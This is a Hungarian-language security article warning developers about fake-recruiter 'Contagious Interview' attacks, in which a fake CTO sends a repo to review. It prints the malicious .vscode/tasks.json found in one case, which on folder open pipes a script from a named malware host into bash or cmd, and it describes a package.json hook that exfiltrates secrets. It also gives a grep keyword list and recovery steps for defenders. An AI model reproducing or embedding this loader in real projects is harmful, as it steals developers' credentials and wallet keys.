Fertőző Interjú: Hogyan hackelnek meg fejlesztőket a hamis toborzók
Összefoglaló: Az államilag támogatott támadások új hulláma a legjobb kripto fejlesztőket sújtja. A csalók toborzónak vagy CTO-nak adják ki magukat, és kényszerítik a jelölteket, hogy nyissanak meg rosszindulatú kódot. Ez a cikk a „Martin Erazo” esetet, a VS Code „tasks.json” exploitot és a túléléshez szükséges „Égetési Protokollt” elemzi.
Jogi nyilatkozat: Ez a cikk olyan kiberbiztonsági incidenseket idéz, ahol valós személyek személyazonosságával való visszaélés történik. A „Martin Erazo” és „Ara Vartanian” nevek a támadók által használt személyekre utalnak. Hisszük, hogy a nevek mögött álló valódi személyek a személyazonosság-lopás ártatlan áldozatai.
1. A Tökéletes Áldozat: A "Martin Erazo" Persona
Egy olyan üzenettel kezdődik, ami minden megfelelő gombot megnyom egy Senior Dev-nél:
- Szerepkör: CTO / Lead Architect
- Költségvetés: 6M USD biztosított finanszírozás
- Tech: Web3, AI, Decentralizált Infrastruktúra
Egy nemrégiben megerősített támadásban egy „Martin Erazo” nevű toborzó vette fel a kapcsolatot LinkedIn-en. A profil egy valódi színházi rendező nevét és képét használta, de a munkatörténet hamis volt, és 2025-ben hirtelen „IT Project Management”-re változott – ez egy kompromittált vagy vásárolt fiók klasszikus jele.
A csalás gyorsan halad. Kihagyják a tipikus HR szűrést, és egyenesen a „Technikai Interjúra” mennek egy senior vezetővel – ebben az esetben a valódi iparági CTO, Ara Vartanian (jelenleg Limit Break) utánzatával.
Piros Zászló: A projektek nevei folyamatosan változnak. A toborzó a „Betfin”-t (egy GameFi platform) árulja, de a küldött prezentáció a „SpaceXView”-ról (egy Metaverse projekt) szól. Ez a következetlenség egy nyom, hogy a csalók újrahasznosítják az eszközöket a kampányok között.
2. A Csapda: „Megnéznéd az MVP kódunkat?”
A hamis „CTO” azt állítja, hogy szükségük van a szakértő szemeidre az MVP (Minimum Viable Product) kód ellenőrzéséhez. Küldenek egy GitHub Repo linket vagy egy ZIP fájlt, és sürgetnek, hogy nyisd meg az interjú alatt vagy közvetlenül utána.
Itt történik a hack.
Kihasználják a segítőkészségedet és az egódat. Azt hiszed, hibát keresel egy React komponensben. A valóságban a „hiba” egy „funkció”, amelyet arra terveztek, hogy ellopja az életed megtakarításait.
3. A Technikai Behatolás: Zero-Click Malware
A támadók „zero-click” vagy „low-click” exploitokat használnak, amelyek a fejlesztői eszközöket célozzák. Nem kell futtatnod az alkalmazást; elég csak megnyitni a mappát.
A Fegyver: .vscode/tasks.json
Ebben a konkrét esetben a Repo egy fertőzött .vscode/tasks.json fájlt tartalmazott. Ez a fájl mondja meg a VS Code-nak, hogyan építse fel a projektet.
Rosszindulatú Kód:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Ez az indító. Amint megnyitod a mappát a VS Code-ban, ez a feladat automatikusan elindul.
- Payload: curl-t használ egy szkript letöltéséhez a
vscodesettingtask.vercel.app-ról – egy ismert malware gazdagépről, amely beállítási API-nak álcázza magát. - Eredmény: A szkript a memóriában fut, és azonnal ellopja a Chrome jelszavakat, a munkamenet sütiket és az SSH kulcsokat.
B Terv: package.json script-ek
Ha a VS Code hackelés sikertelen, ott vannak az npm szkriptek:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Az npm install vagy npm start futtatása elindítja a server/server.js-t – egy helyi C2 (Command and Control) szkriptet, amely kiszivárogtatja a Környezeti Változókat (AWS kulcsok, tárca seed-ek) a támadónak.
4. Piros Zászlók vs Zöld Zászlók
Hogyan vedd észre, mielőtt túl késő lenne?
Ha fejlesztő vagy, a „Privát Repók” vagy ZIP fájlok magas szintű riasztást kell, hogy kiváltsanak. A legitim cégek Nyilvános Repókat vagy szabványos tesztelési platformokat használnak.
Figyelmeztetés: Nem ez az egyetlen módja a fejlesztők elleni támadásnak. Olvass a Kolaborátor Csapdáról a Discordon, és arról, hogyan teszik az Ellátási Lánc Támadások a függőségeket veszélyessé.
| 🚩 Piros Zászló (Fuss) | ✅ Zöld Zászló (Biztonságos) |
|---|---|
| Kód Először: Kódot küld az állásajánlat előtt | Szabványos Folyamat: Interjú először, kód utána |
| Törött Identitás: A toborzónak össze nem függő múltja van (pl. Művész -> IT Menedzser) | Ellenőrzött Előzmények: A LinkedIn karrier következetes |
| Eltérés: A projektek nevei nem egyeznek (Betfin vs SpaceXView) | Következetesség: A név, a dokumentáció és az oldal egyezik |
| Sürgősség: „A CTO vár”, „nyisd meg most” | Türelem: Tiszteletben tartják az idődet és az időbeosztásodat |
| Személyes Email: [email protected] | Céges Email: [email protected] (működő MX rekordokkal) |
5. Biztonsági Protokoll: Hogyan interjúzz biztonságosan
Ha Senior Dev vagy, vadászni fognak rád. A környezeted megerősítése kötelező.
1. Protokoll: "Burner" Környezet
Soha ne használd a fő munkaállomásodat kódtesztelésre.
- Virtuális Gépek: Használj VirtualBoxot vagy VMWare-t.
- Cloud Dev Környezetek: Használj GitHub Codespaces-t vagy Gitpodot. Ezek múlandók és el vannak szigetelve a helyi tárcafájljaidtól.
2. Protokoll: Törvényszéki Audit
Ismeretlen kód megnyitása előtt:
- Ellenőrizd a .vscode/tasks.json-t: Keress ilyet:
runOn: folderOpen. - Ellenőrizd a package.json-t: Keress gyanús preinstall vagy postinstall szkripteket.
- Kulcsszavak: grep a
curl,wget,os.homedir(),.ssh,walletszavakra.
3. Protokoll: VS Code Megerősítése
Tiltsd le a „Workspace Trust”-ot globálisan.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Ez arra kényszeríti a VS Code-ot, hogy engedélyt kérjen, mielőtt mappaszintű feladatokat futtatna.
6. A Megoldás: „Égetési Protokoll” (Burn Protocol)
Ha megnyitottál egy rosszindulatú Repót (mint amit a „Martin Erazo” persona küldött), feltételezd, hogy kompromittálódva vagy. A visszaállítás nem elég.
- Lecsatlakozás: Azonnal húzd ki a hálózati kábelt.
- Tárcák Elégetése: A Privát Kulcsaid kiszivárogtak. Hozz létre új tárcákat egy tiszta eszközön (telefon), és helyezd át a maradék pénzt. Soha ne használd újra a régi seed-et.
- Munkamenetek Leállítása: Jelentkezz ki minden munkamenetből Google, GitHub, AWS fiókokban. Aktívan vond vissza a tokeneket.
- SSH Kulcs Ellenőrzés: Ellenőrizd a GitHub/GitLab beállításokat. A támadók gyakran hozzáadják a saját SSH kulcsaikat, hogy fenntartsák a hátsó ajtó hozzáférést. Törölj mindent, amit nem ismersz fel.
- Nuke It: Töröld a lemezt, és telepítsd újra az operációs rendszert. Ez az egyetlen módja annak, hogy 100%-ig biztos legyél abban, hogy a Rootkit-ek eltűntek.
Következtetés
A „Fertőző Interjú” átverés a saját szakértelmedet használja ellened. A problémamegoldási vágyadat célozza. De a Web3-ban a paranoia szakmai erény. Ellenőrizz minden személyazonosságot, izolálj minden repót, és soha ne bízz olyan „toborzóban”, aki sürget, hogy futtass kódot.
Készen Áll, hogy Munkába Állítsa a Tudását?
Kezdjen el kereskedni AI-alapú magabiztossággal még ma
KezdésKapcsolódó Cikkek
Ellátási Lánc Méreg (Supply Chain Poison): Amikor a megbízható frissítések kártevővé válnak
Nem töltöttél le semmi furcsát. Csak frissítetted a Ledger alkalmazást... És ekkor tűnt el a pénz. Az ellátási lánc elleni támadás borzalma.
A Papírpajzs (The Paper Shield): Hogyan mentsd el helyesen a Seed Phrase-t
A képernyőmentések katasztrofálisak. A felhő valaki más számítógépe. A privát kulcsok tárolásának egyetlen biztonságos módja az 'Acél' és a 'Papír'.
The Long Con: A 'Pig Butchering' pszichológiája
Nem küldött véletlenül üzenetet rossz számra. És nem szerelmes beléd. Mélyrepülés a 'Sha Zhu Pan'-ba, a legkegyetlenebb kripto csalásba, és a forgatókönyv felismerése.